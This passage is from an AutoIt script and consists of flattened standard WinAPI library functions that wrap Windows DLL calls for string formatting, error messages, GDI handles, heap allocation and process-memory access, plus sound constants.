  1817. DllStructSetData($tpoint, "Y", $iy1)
  1818. Return $tpoint
  1819. EndFunc
  1820.  
  1821. Func _winapi_primarylangid($ilngid)
  1822. Return BitAND($ilngid, 1023)
  1823. EndFunc
  1824.  
  1825. Func _winapi_screentoclient($hwnd, ByRef $tpoint)
  1826. Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
  1827. If @error Then Return SetError(@error, @extended, False)
  1828. Return $aresult[0]
  1829. EndFunc
  1830.  
  1831. Func _winapi_shorttoword($ivalue)
  1832. Return BitAND($ivalue, 65535)
  1833. EndFunc
  1834.  
  1835. Func _winapi_strformatbytesize($isize)
  1836. Local $aret = DllCall("shlwapi.dll", "ptr", "StrFormatByteSizeW", "int64", $isize, "wstr", "", "uint", 1024)
  1837. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, "")
  1838. Return $aret[2]
  1839. EndFunc
  1840.  
  1841. Func _winapi_strformatbytesizeex($isize)
  1842. Local $asymbol = DllCall("kernel32.dll", "int", "GetLocaleInfoW", "dword", 1024, "dword", 15, "wstr", "", "int", 2048)
  1843. If @error Then Return SetError(@error + 10, @extended, "")
  1844. Local $ssize = _winapi_strformatbytesize(0)
  1845. If @error Then Return SetError(@error, @extended, "")
  1846. Return StringReplace($ssize, "0", StringRegExpReplace(Number($isize), "(?<=\d)(?=(\d{3})+\z)", $asymbol[3]))
  1847. EndFunc
  1848.  
  1849. Func _winapi_strformatkbsize($isize)
  1850. Local $aret = DllCall("shlwapi.dll", "ptr", "StrFormatKBSizeW", "int64", $isize, "wstr", "", "uint", 1024)
  1851. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, "")
  1852. Return $aret[2]
  1853. EndFunc
  1854.  
  1855. Func _winapi_strfromtimeinterval($itime, $idigits = 7)
  1856. Local $aret = DllCall("shlwapi.dll", "int", "StrFromTimeIntervalW", "wstr", "", "uint", 1024, "dword", $itime, "int", $idigits)
  1857. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, "")
  1858. Return StringStripWS($aret[1], $str_stripleading + $str_striptrailing)
  1859. EndFunc
  1860.  
  1861. Func _winapi_stringfromguid($tguid)
  1862. Local $aresult = DllCall("ole32.dll", "int", "StringFromGUID2", "struct*", $tguid, "wstr", "", "int", 40)
  1863. If @error OR NOT $aresult[0] Then Return SetError(@error, @extended, "")
  1864. Return SetExtended($aresult[0], $aresult[2])
  1865. EndFunc
  1866.  
  1867. Func _winapi_sublangid($ilngid)
  1868. Return BitShift($ilngid, 10)
  1869. EndFunc
  1870.  
  1871. Func _winapi_swapdword($ivalue)
  1872. Local $tstruct1 = DllStructCreate("dword;dword")
  1873. Local $tstruct2 = DllStructCreate("byte[4];byte[4]", DllStructGetPtr($tstruct1))
  1874. DllStructSetData($tstruct1, 1, $ivalue)
  1875. For $i = 1 To 4
  1876. DllStructSetData($tstruct2, 2, DllStructGetData($tstruct2, 1, 5 - $i), $i)
  1877. Next
  1878. Return DllStructGetData($tstruct1, 2)
  1879. EndFunc
  1880.  
  1881. Func _winapi_swapqword($ivalue)
  1882. Local $tstruct1 = DllStructCreate("int64;int64")
  1883. Local $tstruct2 = DllStructCreate("byte[8];byte[8]", DllStructGetPtr($tstruct1))
  1884. DllStructSetData($tstruct1, 1, $ivalue)
  1885. For $i = 1 To 8
  1886. DllStructSetData($tstruct2, 2, DllStructGetData($tstruct2, 1, 9 - $i), $i)
  1887. Next
  1888. Return DllStructGetData($tstruct1, 2)
  1889. EndFunc
  1890.  
  1891. Func _winapi_swapword($ivalue)
  1892. Local $tstruct1 = DllStructCreate("word;word")
  1893. Local $tstruct2 = DllStructCreate("byte[2];byte[2]", DllStructGetPtr($tstruct1))
  1894. DllStructSetData($tstruct1, 1, $ivalue)
  1895. For $i = 1 To 2
  1896. DllStructSetData($tstruct2, 2, DllStructGetData($tstruct2, 1, 3 - $i), $i)
  1897. Next
  1898. Return DllStructGetData($tstruct1, 2)
  1899. EndFunc
  1900.  
  1901. Func _winapi_widechartomultibyte($vunicode, $icodepage = 0, $bretnostruct = True, $bretbinary = False)
  1902. Local $sunicodetype = "wstr"
  1903. If NOT IsString($vunicode) Then $sunicodetype = "struct*"
  1904. Local $aresult = DllCall("kernel32.dll", "int", "WideCharToMultiByte", "uint", $icodepage, "dword", 0, $sunicodetype, $vunicode, "int", -1, "ptr", 0, "int", 0, "ptr", 0, "ptr", 0)
  1905. If @error OR NOT $aresult[0] Then Return SetError(@error + 20, @extended, "")
  1906. Local $tmultibyte = DllStructCreate((($bretbinary) ? ("byte") : ("char")) & "[" & $aresult[0] & "]")
  1907. $aresult = DllCall("kernel32.dll", "int", "WideCharToMultiByte", "uint", $icodepage, "dword", 0, $sunicodetype, $vunicode, "int", -1, "struct*", $tmultibyte, "int", $aresult[0], "ptr", 0, "ptr", 0)
  1908. If @error OR NOT $aresult[0] Then Return SetError(@error + 10, @extended, "")
  1909. If $bretnostruct Then Return DllStructGetData($tmultibyte, 1)
  1910. Return $tmultibyte
  1911. EndFunc
  1912.  
  1913. Func _winapi_wordtoshort($ivalue)
  1914. If BitAND($ivalue, 32768) Then
  1915. Return BitOR($ivalue, -32768)
  1916. EndIf
  1917. Return BitAND($ivalue, 32767)
  1918. EndFunc
  1919.  
  1920. #EndRegion Public Functions
  1921. #Region Global Variables and Constants
  1922. Global Const $format_message_allocate_buffer = 256
  1923. Global Const $format_message_ignore_inserts = 512
  1924. Global Const $format_message_from_string = 1024
  1925. Global Const $format_message_from_hmodule = 2048
  1926. Global Const $format_message_from_system = 4096
  1927. Global Const $format_message_argument_array = 8192
  1928. #EndRegion Global Variables and Constants
  1929.  
  1930. Func _winapi_beep($ifreq = 500, $iduration = 1000)
  1931. Local $aresult = DllCall("kernel32.dll", "bool", "Beep", "dword", $ifreq, "dword", $iduration)
  1932. If @error Then Return SetError(@error, @extended, False)
  1933. Return $aresult[0]
  1934. EndFunc
  1935.  
  1936. Func _winapi_formatmessage($iflags, $psource, $imessageid, $ilanguageid, ByRef $pbuffer, $isize, $varguments)
  1937. Local $sbuffertype = "struct*"
  1938. If IsString($pbuffer) Then $sbuffertype = "wstr"
  1939. Local $aresult = DllCall("kernel32.dll", "dword", "FormatMessageW", "dword", $iflags, "struct*", $psource, "dword", $imessageid, "dword", $ilanguageid, $sbuffertype, $pbuffer, "dword", $isize, "ptr", $varguments)
  1940. If @error OR NOT $aresult[0] Then Return SetError(@error + 10, @extended, 0)
  1941. If $sbuffertype = "wstr" Then $pbuffer = $aresult[5]
  1942. Return $aresult[0]
  1943. EndFunc
  1944.  
  1945. Func _winapi_geterrormessage($icode, $ilanguage = 0, Const $_icurrenterror = @error, Const $_icurrentextended = @extended)
  1946. Local $aret = DllCall("kernel32.dll", "dword", "FormatMessageW", "dword", 4096, "ptr", 0, "dword", $icode, "dword", $ilanguage, "wstr", "", "dword", 4096, "ptr", 0)
  1947. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, "")
  1948. Return SetError($_icurrenterror, $_icurrentextended, StringRegExpReplace($aret[5], "[" & @LF & "," & @CR & "]*\Z", ""))
  1949. EndFunc
  1950.  
  1951. Func _winapi_getlasterror(Const $_icurrenterror = @error, Const $_icurrentextended = @extended)
  1952. Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
  1953. Return SetError($_icurrenterror, $_icurrentextended, $aresult[0])
  1954. EndFunc
  1955.  
  1956. Func _winapi_getlasterrormessage(Const $_icurrenterror = @error, Const $_icurrentextended = @extended)
  1957. Local $ilasterror = _winapi_getlasterror()
  1958. Local $tbufferptr = DllStructCreate("ptr")
  1959. Local $ncount = _winapi_formatmessage(BitOR($format_message_allocate_buffer, $format_message_from_system), 0, $ilasterror, 0, $tbufferptr, 0, 0)
  1960. If @error Then Return SetError(-@error, @extended, "")
  1961. Local $stext = ""
  1962. Local $pbuffer = DllStructGetData($tbufferptr, 1)
  1963. If $pbuffer Then
  1964. If $ncount > 0 Then
  1965. Local $tbuffer = DllStructCreate("wchar[" & ($ncount + 1) & "]", $pbuffer)
  1966. $stext = DllStructGetData($tbuffer, 1)
  1967. If StringRight($stext, 2) = @CRLF Then $stext = StringTrimRight($stext, 2)
  1968. EndIf
  1969. DllCall("kernel32.dll", "handle", "LocalFree", "handle", $pbuffer)
  1970. EndIf
  1971. Return SetError($_icurrenterror, $_icurrentextended, $stext)
  1972. EndFunc
  1973.  
  1974. Func _winapi_messagebeep($itype = 1)
  1975. Local $isound
  1976. Switch $itype
  1977. Case 1
  1978. $isound = 0
  1979. Case 2
  1980. $isound = 16
  1981. Case 3
  1982. $isound = 32
  1983. Case 4
  1984. $isound = 48
  1985. Case 5
  1986. $isound = 64
  1987. Case Else
  1988. $isound = -1
  1989. EndSwitch
  1990. Local $aresult = DllCall("user32.dll", "bool", "MessageBeep", "uint", $isound)
  1991. If @error Then Return SetError(@error, @extended, False)
  1992. Return $aresult[0]
  1993. EndFunc
  1994.  
  1995. Func _winapi_msgbox($iflags, $stitle, $stext)
  1996. BlockInput(0)
  1997. MsgBox($iflags, $stitle, $stext & " ")
  1998. EndFunc
  1999.  
  2000. Func _winapi_setlasterror($ierrorcode, Const $_icurrenterror = @error, Const $_icurrentextended = @extended)
  2001. DllCall("kernel32.dll", "none", "SetLastError", "dword", $ierrorcode)
  2002. Return SetError($_icurrenterror, $_icurrentextended, NULL )
  2003. EndFunc
  2004.  
  2005. Func _winapi_showerror($stext, $bexit = True)
  2006. BlockInput(0)
  2007. MsgBox($mb_systemmodal, "Error", $stext & " ")
  2008. If $bexit Then Exit
  2009. EndFunc
  2010.  
  2011. Func _winapi_showlasterror($stext = "", $babort = False, $ilanguage = 0, Const $_icurrenterror = @error, Const $_icurrentextended = @extended)
  2012. Local $serror
  2013. Local $ilasterror = _winapi_getlasterror()
  2014. While 1
  2015. $serror = _winapi_geterrormessage($ilasterror, $ilanguage)
  2016. If @error AND $ilanguage Then
  2017. $ilanguage = 0
  2018. Else
  2019. ExitLoop
  2020. EndIf
  2021. WEnd
  2022. If StringStripWS($stext, $str_stripleading + $str_striptrailing) Then
  2023. $stext &= @CRLF & @CRLF
  2024. Else
  2025. $stext = ""
  2026. EndIf
  2027. _winapi_msgbox(BitOR(262144, BitShift(16, -2 * (NOT $ilasterror))), $ilasterror, $stext & $serror)
  2028. If $ilasterror Then
  2029. _winapi_setlasterror($ilasterror)
  2030. If $babort Then
  2031. Exit $ilasterror
  2032. EndIf
  2033. EndIf
  2034. Return SetError($_icurrenterror, $_icurrentextended, 1)
  2035. EndFunc
  2036.  
  2037. Func _winapi_showmsg($stext)
  2038. _winapi_msgbox($mb_systemmodal, "Information", $stext)
  2039. EndFunc
  2040.  
  2041. Func __comerrorformating(ByRef $ocomerror, $sprefix = @TAB)
  2042. Local Const $str_striptrailing = 2
  2043. Local $serror = "COM Error encountered in " & @ScriptName & " (" & $ocomerror.scriptline & ") :" & @CRLF & $sprefix & "Number " & @TAB & "= 0x" & Hex($ocomerror.number, 8) & " (" & $ocomerror.number & ")" & @CRLF & $sprefix & "WinDescription" & @TAB & "= " & StringStripWS($ocomerror.windescription, $str_striptrailing) & @CRLF & $sprefix & "Description " & @TAB & "= " & StringStripWS($ocomerror.description, $str_striptrailing) & @CRLF & $sprefix & "Source " & @TAB & "= " & $ocomerror.source & @CRLF & $sprefix & "HelpFile " & @TAB & "= " & $ocomerror.helpfile & @CRLF & $sprefix & "HelpContext " & @TAB & "= " & $ocomerror.helpcontext & @CRLF & $sprefix & "LastDllError " & @TAB & "= " & $ocomerror.lastdllerror & @CRLF & $sprefix & "Retcode " & @TAB & "= 0x" & Hex($ocomerror.retcode)
  2044. Return $serror
  2045. EndFunc
  2046.  
  2047. #Region Global Variables and Constants
  2048. Global Const $duplicate_close_source = 1
  2049. Global Const $duplicate_same_access = 2
  2050. Global Const $obj_bitmap = 7
  2051. Global Const $obj_brush = 2
  2052. Global Const $obj_colorspace = 14
  2053. Global Const $obj_dc = 3
  2054. Global Const $obj_enhmetadc = 12
  2055. Global Const $obj_enhmetafile = 13
  2056. Global Const $obj_extpen = 11
  2057. Global Const $obj_font = 6
  2058. Global Const $obj_memdc = 10
  2059. Global Const $obj_metadc = 4
  2060. Global Const $obj_metafile = 9
  2061. Global Const $obj_pal = 5
  2062. Global Const $obj_pen = 1
  2063. Global Const $obj_region = 8
  2064. Global Const $null_brush = 5
  2065. Global Const $null_pen = 8
  2066. Global Const $black_brush = 4
  2067. Global Const $dkgray_brush = 3
  2068. Global Const $dc_brush = 18
  2069. Global Const $gray_brush = 2
  2070. Global Const $hollow_brush = $null_brush
  2071. Global Const $ltgray_brush = 1
  2072. Global Const $white_brush = 0
  2073. Global Const $black_pen = 7
  2074. Global Const $dc_pen = 19
  2075. Global Const $white_pen = 6
  2076. Global Const $ansi_fixed_font = 11
  2077. Global Const $ansi_var_font = 12
  2078. Global Const $device_default_font = 14
  2079. Global Const $default_gui_font = 17
  2080. Global Const $oem_fixed_font = 10
  2081. Global Const $system_font = 13
  2082. Global Const $system_fixed_font = 16
  2083. Global Const $default_palette = 15
  2084. #EndRegion Global Variables and Constants
  2085. #Region Functions list
  2086. #EndRegion Functions list
  2087. #Region Public Functions
  2088.  
  2089. Func _winapi_closehandle($hobject)
  2090. Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
  2091. If @error Then Return SetError(@error, @extended, False)
  2092. Return $aresult[0]
  2093. EndFunc
  2094.  
  2095. Func _winapi_deleteobject($hobject)
  2096. Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
  2097. If @error Then Return SetError(@error, @extended, False)
  2098. Return $aresult[0]
  2099. EndFunc
  2100.  
  2101. Func _winapi_duplicatehandle($hsourceprocesshandle, $hsourcehandle, $htargetprocesshandle, $idesiredaccess, $iinherithandle, $ioptions)
  2102. Local $aresult = DllCall("kernel32.dll", "bool", "DuplicateHandle", "handle", $hsourceprocesshandle, "handle", $hsourcehandle, "handle", $htargetprocesshandle, "handle*", 0, "dword", $idesiredaccess, "bool", $iinherithandle, "dword", $ioptions)
  2103. If @error OR NOT $aresult[0] Then Return SetError(@error, @extended, 0)
  2104. Return $aresult[4]
  2105. EndFunc
  2106.  
  2107. Func _winapi_getcurrentobject($hdc, $itype)
  2108. Local $aret = DllCall("gdi32.dll", "handle", "GetCurrentObject", "handle", $hdc, "uint", $itype)
  2109. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, 0)
  2110. Return $aret[0]
  2111. EndFunc
  2112.  
  2113. Func _winapi_getcurrentprocess()
  2114. Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentProcess")
  2115. If @error Then Return SetError(@error, @extended, 0)
  2116. Return $aresult[0]
  2117. EndFunc
  2118.  
  2119. Func _winapi_getobject($hobject, $isize, $pobject)
  2120. Local $aresult = DllCall("gdi32.dll", "int", "GetObjectW", "handle", $hobject, "int", $isize, "struct*", $pobject)
  2121. If @error Then Return SetError(@error, @extended, 0)
  2122. Return $aresult[0]
  2123. EndFunc
  2124.  
  2125. Func _winapi_getobjectinfobyhandle($hobject)
  2126. Local $tagpublic_object_basic_information = "ulong Attributes;ulong GrantedAcess;ulong HandleCount;ulong PointerCount;ulong Reserved[10]"
  2127. Local $tpobi = DllStructCreate($tagpublic_object_basic_information)
  2128. Local $aret = DllCall("ntdll.dll", "long", "ZwQueryObject", "handle", $hobject, "uint", 0, "struct*", $tpobi, "ulong", DllStructGetSize($tpobi), "ptr", 0)
  2129. If @error Then Return SetError(@error, @extended, 0)
  2130. If $aret[0] Then Return SetError(10, $aret[0], 0)
  2131. Local $aresult[4]
  2132. For $i = 0 To 3
  2133. $aresult[$i] = DllStructGetData($tpobi, $i + 1)
  2134. Next
  2135. Return $aresult
  2136. EndFunc
  2137.  
  2138. Func _winapi_getobjectnamebyhandle($hobject)
  2139. Local $tagunicode_string = "struct;ushort Length;ushort MaximumLength;ptr Buffer;endstruct"
  2140. Local $tagpublic_object_type_information = "struct;" & $tagunicode_string & ";ulong Reserved[22];endstruct"
  2141. Local $tpoti = DllStructCreate($tagpublic_object_type_information & ";byte[32]")
  2142. Local $aret = DllCall("ntdll.dll", "long", "ZwQueryObject", "handle", $hobject, "uint", 2, "struct*", $tpoti, "ulong", DllStructGetSize($tpoti), "ulong*", 0)
  2143. If @error Then Return SetError(@error, @extended, "")
  2144. If $aret[0] Then Return SetError(10, $aret[0], "")
  2145. Local $pdata = DllStructGetData($tpoti, 3)
  2146. If NOT $pdata Then Return SetError(11, 0, "")
  2147. Return _winapi_getstring($pdata)
  2148. EndFunc
  2149.  
  2150. Func _winapi_getobjecttype($hobject)
  2151. Local $aret = DllCall("gdi32.dll", "dword", "GetObjectType", "handle", $hobject)
  2152. If @error Then Return SetError(@error, @extended, 0)
  2153. Return $aret[0]
  2154. EndFunc
  2155.  
  2156. Func _winapi_getstdhandle($istdhandle)
  2157. If $istdhandle < 0 OR $istdhandle > 2 Then Return SetError(2, 0, -1)
  2158. Local Const $ahandle[3] = [-10, -11, -12]
  2159. Local $aresult = DllCall("kernel32.dll", "handle", "GetStdHandle", "dword", $ahandle[$istdhandle])
  2160. If @error Then Return SetError(@error, @extended, -1)
  2161. Return $aresult[0]
  2162. EndFunc
  2163.  
  2164. Func _winapi_getstockobject($iobject)
  2165. Local $aresult = DllCall("gdi32.dll", "handle", "GetStockObject", "int", $iobject)
  2166. If @error Then Return SetError(@error, @extended, 0)
  2167. Return $aresult[0]
  2168. EndFunc
  2169.  
  2170. Func _winapi_selectobject($hdc, $hgdiobj)
  2171. Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
  2172. If @error Then Return SetError(@error, @extended, False)
  2173. Return $aresult[0]
  2174. EndFunc
  2175.  
  2176. Func _winapi_sethandleinformation($hobject, $imask, $iflags)
  2177. Local $aresult = DllCall("kernel32.dll", "bool", "SetHandleInformation", "handle", $hobject, "dword", $imask, "dword", $iflags)
  2178. If @error Then Return SetError(@error, @extended, False)
  2179. Return $aresult[0]
  2180. EndFunc
  2181.  
  2182. #EndRegion Public Functions
  2183. #Region Global Variables and Constants
  2184. Global $__g_hheap = 0
  2185. #EndRegion Global Variables and Constants
  2186. #Region Functions list
  2187. #EndRegion Functions list
  2188. #Region Public Functions
  2189.  
  2190. Func _winapi_createbuffer($ilength, $pbuffer = 0, $babort = True)
  2191. $pbuffer = __heaprealloc($pbuffer, $ilength, 0, $babort)
  2192. If @error Then Return SetError(@error, @extended, 0)
  2193. Return $pbuffer
  2194. EndFunc
  2195.  
  2196. Func _winapi_createbufferfromstruct($tstruct, $pbuffer = 0, $babort = True)
  2197. If NOT IsDllStruct($tstruct) Then Return SetError(1, 0, 0)
  2198. $pbuffer = __heaprealloc($pbuffer, DllStructGetSize($tstruct), 0, $babort)
  2199. If @error Then Return SetError(@error + 100, @extended, 0)
  2200. _winapi_movememory($pbuffer, $tstruct, DllStructGetSize($tstruct))
  2201. Return $pbuffer
  2202. EndFunc
  2203.  
  2204. Func _winapi_createstring($sstring, $pstring = 0, $ilength = -1, $bunicode = True, $babort = True)
  2205. $ilength = Number($ilength)
  2206. If $ilength >= 0 Then
  2207. $sstring = StringLeft($sstring, $ilength)
  2208. Else
  2209. $ilength = StringLen($sstring)
  2210. EndIf
  2211. Local $isize = $ilength + 1
  2212. If $bunicode Then
  2213. $isize *= 2
  2214. EndIf
  2215. $pstring = __heaprealloc($pstring, $isize, 0, $babort)
  2216. If @error Then Return SetError(@error, @extended, 0)
  2217. DllStructSetData(DllStructCreate(($bunicode ? "wchar" : "char") & "[" & ($ilength + 1) & "]", $pstring), 1, $sstring)
  2218. Return SetExtended($ilength, $pstring)
  2219. EndFunc
  2220.  
  2221. Func _winapi_equalmemory($psource1, $psource2, $ilength)
  2222. If _winapi_isbadreadptr($psource1, $ilength) Then Return SetError(11, @extended, 0)
  2223. If _winapi_isbadreadptr($psource2, $ilength) Then Return SetError(12, @extended, 0)
  2224. Local $aret = DllCall("ntdll.dll", "ulong_ptr", "RtlCompareMemory", "struct*", $psource1, "struct*", $psource2, "ulong_ptr", $ilength)
  2225. If @error Then Return SetError(@error, @extended, 0)
  2226. Return Number($aret[0] = $ilength)
  2227. EndFunc
  2228.  
  2229. Func _winapi_fillmemory($pmemory, $ilength, $ivalue = 0)
  2230. If _winapi_isbadwriteptr($pmemory, $ilength) Then Return SetError(11, @extended, 0)
  2231. DllCall("ntdll.dll", "none", "RtlFillMemory", "struct*", $pmemory, "ulong_ptr", $ilength, "byte", $ivalue)
  2232. If @error Then Return SetError(@error, @extended, 0)
  2233. Return 1
  2234. EndFunc
  2235.  
  2236. Func _winapi_freememory($pmemory)
  2237. If NOT __heapfree($pmemory, 1) Then Return SetError(@error, @extended, 0)
  2238. Return 1
  2239. EndFunc
  2240.  
  2241. Func _winapi_getmemorysize($pmemory)
  2242. Local $iresult = __heapsize($pmemory, 1)
  2243. If @error Then Return SetError(@error, @extended, 0)
  2244. Return $iresult
  2245. EndFunc
  2246.  
  2247. Func _winapi_globalmemorystatus()
  2248. Local Const $tagmemorystatusex = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual"
  2249. Local $tmem = DllStructCreate($tagmemorystatusex)
  2250. DllStructSetData($tmem, 1, DllStructGetSize($tmem))
  2251. Local $aret = DllCall("kernel32.dll", "bool", "GlobalMemoryStatusEx", "struct*", $tmem)
  2252. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  2253. Local $amem[7]
  2254. $amem[0] = DllStructGetData($tmem, 2)
  2255. $amem[1] = DllStructGetData($tmem, 3)
  2256. $amem[2] = DllStructGetData($tmem, 4)
  2257. $amem[3] = DllStructGetData($tmem, 5)
  2258. $amem[4] = DllStructGetData($tmem, 6)
  2259. $amem[5] = DllStructGetData($tmem, 7)
  2260. $amem[6] = DllStructGetData($tmem, 8)
  2261. Return $amem
  2262. EndFunc
  2263.  
  2264. Func _winapi_isbadcodeptr($paddress)
  2265. Local $aret = DllCall("kernel32.dll", "bool", "IsBadCodePtr", "struct*", $paddress)
  2266. If @error Then Return SetError(@error, @extended, False)
  2267. Return $aret[0]
  2268. EndFunc
  2269.  
  2270. Func _winapi_isbadreadptr($paddress, $ilength)
  2271. Local $aret = DllCall("kernel32.dll", "bool", "IsBadReadPtr", "struct*", $paddress, "uint_ptr", $ilength)
  2272. If @error Then Return SetError(@error, @extended, False)
  2273. Return $aret[0]
  2274. EndFunc
  2275.  
  2276. Func _winapi_isbadstringptr($paddress, $ilength)
  2277. Local $aret = DllCall("kernel32.dll", "bool", "IsBadStringPtr", "struct*", $paddress, "uint_ptr", $ilength)
  2278. If @error Then Return SetError(@error, @extended, False)
  2279. Return $aret[0]
  2280. EndFunc
  2281.  
  2282. Func _winapi_isbadwriteptr($paddress, $ilength)
  2283. Local $aret = DllCall("kernel32.dll", "bool", "IsBadWritePtr", "struct*", $paddress, "uint_ptr", $ilength)
  2284. If @error Then Return SetError(@error, @extended, False)
  2285. Return $aret[0]
  2286. EndFunc
  2287.  
  2288. Func _winapi_ismemory($pmemory)
  2289. Local $bresult = __heapvalidate($pmemory)
  2290. Return SetError(@error, @extended, $bresult)
  2291. EndFunc
  2292.  
  2293. Func _winapi_localfree($hmemory)
  2294. Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmemory)
  2295. If @error Then Return SetError(@error, @extended, False)
  2296. Return $aresult[0]
  2297. EndFunc
  2298.  
  2299. Func _winapi_movememory($pdestination, $psource, $ilength)
  2300. If _winapi_isbadreadptr($psource, $ilength) Then Return SetError(10, @extended, 0)
  2301. If _winapi_isbadwriteptr($pdestination, $ilength) Then Return SetError(11, @extended, 0)
  2302. DllCall("ntdll.dll", "none", "RtlMoveMemory", "struct*", $pdestination, "struct*", $psource, "ulong_ptr", $ilength)
  2303. If @error Then Return SetError(@error, @extended, 0)
  2304. Return 1
  2305. EndFunc
  2306.  
  2307. Func _winapi_readprocessmemory($hprocess, $pbaseaddress, $pbuffer, $isize, ByRef $iread)
  2308. Local $aresult = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "handle", $hprocess, "ptr", $pbaseaddress, "struct*", $pbuffer, "ulong_ptr", $isize, "ulong_ptr*", 0)
  2309. If @error Then Return SetError(@error, @extended, False)
  2310. $iread = $aresult[5]
  2311. Return $aresult[0]
  2312. EndFunc
  2313.  
  2314. Func _winapi_writeprocessmemory($hprocess, $pbaseaddress, $pbuffer, $isize, ByRef $iwritten, $sbuffer = "ptr")
  2315. Local $aresult = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $hprocess, "ptr", $pbaseaddress, $sbuffer, $pbuffer, "ulong_ptr", $isize, "ulong_ptr*", 0)
  2316. If @error Then Return SetError(@error, @extended, False)
  2317. $iwritten = $aresult[5]
  2318. Return $aresult[0]
  2319. EndFunc
  2320.  
  2321. Func _winapi_zeromemory($pmemory, $ilength)
  2322. If _winapi_isbadwriteptr($pmemory, $ilength) Then Return SetError(11, @extended, 0)
  2323. DllCall("ntdll.dll", "none", "RtlZeroMemory", "struct*", $pmemory, "ulong_ptr", $ilength)
  2324. If @error Then Return SetError(@error, @extended, 0)
  2325. Return 1
  2326. EndFunc
  2327.  
  2328. #EndRegion Public Functions
  2329. #Region Internal Functions
  2330.  
  2331. Func __heapalloc($isize, $babort = False)
  2332. Local $aret
  2333. If NOT $__g_hheap Then
  2334. $aret = DllCall("kernel32.dll", "handle", "HeapCreate", "dword", 0, "ulong_ptr", 0, "ulong_ptr", 0)
  2335. If @error OR NOT $aret[0] Then __fatalexit(1, "Error allocating memory.")
  2336. $__g_hheap = $aret[0]
  2337. EndIf
  2338. $aret = DllCall("kernel32.dll", "ptr", "HeapAlloc", "handle", $__g_hheap, "dword", 8, "ulong_ptr", $isize)
  2339. If @error OR NOT $aret[0] Then
  2340. If $babort Then __fatalexit(1, "Error allocating memory.")
  2341. Return SetError(@error + 30, @extended, 0)
  2342. EndIf
  2343. Return $aret[0]
  2344. EndFunc
  2345.  
  2346. Func __heapfree(ByRef $pmemory, $bcheck = False, $icurerr = @error, $icurext = @extended)
  2347. If $bcheck AND (NOT __heapvalidate($pmemory)) Then Return SetError(@error, @extended, 0)
  2348. Local $aret = DllCall("kernel32.dll", "int", "HeapFree", "handle", $__g_hheap, "dword", 0, "ptr", $pmemory)
  2349. If @error OR NOT $aret[0] Then Return SetError(@error + 40, @extended, 0)
  2350. $pmemory = 0
  2351. Return SetError($icurerr, $icurext, 1)
  2352. EndFunc
  2353.  
  2354. Func __heaprealloc($pmemory, $isize, $bamount = False, $babort = False)
  2355. Local $aret, $pret
  2356. If __heapvalidate($pmemory) Then
  2357. If $bamount AND (__heapsize($pmemory) >= $isize) Then Return SetExtended(1, Ptr($pmemory))
  2358. $aret = DllCall("kernel32.dll", "ptr", "HeapReAlloc", "handle", $__g_hheap, "dword", 8, "ptr", $pmemory, "ulong_ptr", $isize)
  2359. If @error OR NOT $aret[0] Then
  2360. If $babort Then __fatalexit(1, "Error allocating memory.")
  2361. Return SetError(@error + 20, @extended, Ptr($pmemory))
  2362. EndIf
  2363. $pret = $aret[0]
  2364. Else
  2365. $pret = __heapalloc($isize, $babort)
  2366. If @error Then Return SetError(@error, @extended, 0)
  2367. EndIf
  2368. Return $pret
  2369. EndFunc
  2370.  
  2371. Func __heapsize($pmemory, $bcheck = False)
  2372. If $bcheck AND (NOT __heapvalidate($pmemory)) Then Return SetError(@error, @extended, 0)
  2373. Local $aret = DllCall("kernel32.dll", "ulong_ptr", "HeapSize", "handle", $__g_hheap, "dword", 0, "ptr", $pmemory)
  2374. If @error OR ($aret[0] = Ptr(-1)) Then Return SetError(@error + 50, @extended, 0)
  2375. Return $aret[0]
  2376. EndFunc
  2377.  
  2378. Func __heapvalidate($pmemory)
  2379. If (NOT $__g_hheap) OR (NOT Ptr($pmemory)) Then Return SetError(9, 0, False)
  2380. Local $aret = DllCall("kernel32.dll", "int", "HeapValidate", "handle", $__g_hheap, "dword", 0, "ptr", $pmemory)
  2381. If @error Then Return SetError(@error, @extended, False)
  2382. Return $aret[0]
  2383. EndFunc
  2384.  
  2385. #EndRegion Internal Functions
  2386. Global Const $snd_application = 128
  2387. Global Const $snd_alias = 65536
  2388. Global Const $snd_alias_id = 1114112
  2389. Global Const $snd_async = 1
  2390. Global Const $snd_filename = 131072
  2391. Global Const $snd_loop = 8
  2392. Global Const $snd_memory = 4
  2393. Global Const $snd_nodefault = 2
  2394. Global Const $snd_nostop = 16
  2395. Global Const $snd_nowait = 8192
  2396. Global Const $snd_purge = 64
  2397. Global Const $snd_resource = 262148
  2398. Global Const $snd_sentry = 524288
  2399. Global Const $snd_sync = 0
  2400. Global Const $snd_system = 2097152
  2401. Global Const $snd_system_nostop = 2097168
  2402. Global Const $snd_alias_systemasterisk = "SystemAsterisk"
  2403. Global Const $snd_alias_systemdefault = "SystemDefault"
  2404. Global Const $snd_alias_systemexclamation = "SystemExclamation"
  2405. Global Const $snd_alias_systemexit = "SystemExit"
  2406. Global Const $snd_alias_systemhand = "SystemHand"
  2407. Global Const $snd_alias_systemquestion = "SystemQuestion"
  2408. Global Const $snd_alias_systemstart = "SystemStart"
  2409. Global Const $snd_alias_systemwelcome = "SystemWelcome"
  2410. #Region Global Variables and Constants
  2411. #EndRegion Global Variables and Constants
  2412. #Region Functions list
  2413. #EndRegion Functions list
  2414. #Region Public Functions
  2415.  
  2416. Func _winapi_arraytostruct(Const ByRef $adata, $istart = 0, $iend = -1)
